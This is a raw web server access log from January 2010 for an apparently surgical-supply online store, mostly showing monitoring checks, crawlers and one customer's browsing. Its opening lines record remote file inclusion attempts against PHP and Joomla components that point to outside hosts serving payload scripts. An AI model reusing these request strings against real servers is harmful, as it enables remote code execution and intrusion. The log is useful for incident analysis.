209.59.12.99 - - [05/Jan/2010:00:00:02 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.184.72.4 - - [05/Jan/2010:00:00:02 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
78.110.50.110 - - [05/Jan/2010:00:00:06 -0500] "GET /logs/access_log.Q109080200%20%20//modules/errors.php?error=http://musicadelibreria.net/footer? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
78.110.50.110 - - [05/Jan/2010:00:00:06 -0500] "GET //modules/errors.php?error=http://musicadelibreria.net/footer? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
78.110.50.110 - - [05/Jan/2010:00:00:07 -0500] "GET /logs//modules/errors.php?error=http://musicadelibreria.net/footer? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
78.110.50.110 - - [05/Jan/2010:00:00:09 -0500] "GET /logs/access_log.Q109080200//modules/errors.php?error=http://musicadelibreria.net/footer? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
78.110.50.110 - - [05/Jan/2010:00:00:09 -0500] "GET //modules/errors.php?error=http://musicadelibreria.net/footer? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
78.110.50.110 - - [05/Jan/2010:00:00:09 -0500] "GET /logs//modules/errors.php?error=http://musicadelibreria.net/footer? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
78.110.50.110 - - [05/Jan/2010:00:00:25 -0500] "GET /logs/access_log.Q109100700//modules/errors.php?error=http://musicadelibreria.net/footer? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
78.110.50.110 - - [05/Jan/2010:00:00:51 -0500] "GET /logs/access_log.Q109100700%20%20//modules/errors.php?error=http://musicadelibreria.net/footer? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
208.113.237.37 - - [05/Jan/2010:00:00:58 -0500] "GET /logs/access_log.Q109080200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:00:01:19 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:00:01:29 -0500] "GET /logs/access_log.Q109121600%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:00:01:29 -0500] "GET /logs/access_log.Q109120600%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:00:02:04 -0500] "GET /logs/access_log.Q109120100//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:00:02:11 -0500] "GET /logs/error_log.Q109090600 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.195.114.54 - - [05/Jan/2010:00:03:12 -0500] "GET /logs/error_log.Q109062900 HTTP/1.0" 200 3131493 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.54 - - [05/Jan/2010:00:03:16 -0500] "GET /logs/error_log.Q109062900 HTTP/1.0" 200 3131493 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.47.7.71 - - [05/Jan/2010:00:04:17 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:04:17 -0500] "GET /logs/access_log.Q109121600//admin/classes/TplLoad.php?full_path_to_public_program=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:04:17 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:04:20 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:04:20 -0500] "GET /logs/access_log.Q109121600//admin/classes/TplLoad.php?full_path_to_public_program=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:04:20 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:04:20 -0500] "GET /logs/access_log.Q109120600//admin/classes/TplLoad.php?full_path_to_public_program=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:04:22 -0500] "GET /logs/access_log.Q109120600//admin/classes/TplLoad.php?full_path_to_public_program=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
170.210.192.78 - - [05/Jan/2010:00:04:47 -0500] "GET /logs/modules/mod_mainmenu.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
170.210.192.78 - - [05/Jan/2010:00:04:47 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
170.210.192.78 - - [05/Jan/2010:00:04:59 -0500] "GET /logs/access_log.Q109052300/modules/mod_mainmenu.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
170.210.192.78 - - [05/Jan/2010:00:05:00 -0500] "GET /logs/access_log.Q109080900/modules/mod_mainmenu.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:00:05:21 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.189.176.113 - - [05/Jan/2010:00:05:23 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:24 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:24 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:24 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:31 -0500] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992 HTTP/1.1" 200 37481 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:32 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:32 -0500] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:32 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:32 -0500] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:32 -0500] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:32 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:32 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:32 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:33 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:33 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:33 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:33 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:33 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:34 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:34 -0500] "GET /images/blend.jpg HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:34 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:34 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:34 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:34 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:34 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:35 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:35 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:35 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:35 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:35 -0500] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:39 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1195E55754D39300D99F06J+M37+ENG HTTP/1.1" 200 77353 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092992" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:41 -0500] "GET /images/cat_dot.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1195E55754D39300D99F06J+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:41 -0500] "GET /images/cat_link.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1195E55754D39300D99F06J+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:41 -0500] "GET /images/cat_expand.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1195E55754D39300D99F06J+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:45 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1195E55F53938300D27F06J+M37+ENG HTTP/1.1" 200 41327 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:46 -0500] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1195E55F53938300D27F06J+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:46 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1195E55F53938300D27F06J+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:46 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1195E55F53938300D27F06J+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:46 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1195E55F53938300D27F06J+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:46 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1195E55F53938300D27F06J+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:46 -0500] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1195E55F53938300D27F06J+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.189.176.113 - - [05/Jan/2010:00:05:46 -0500] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1195E55F53938300D27F06J+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
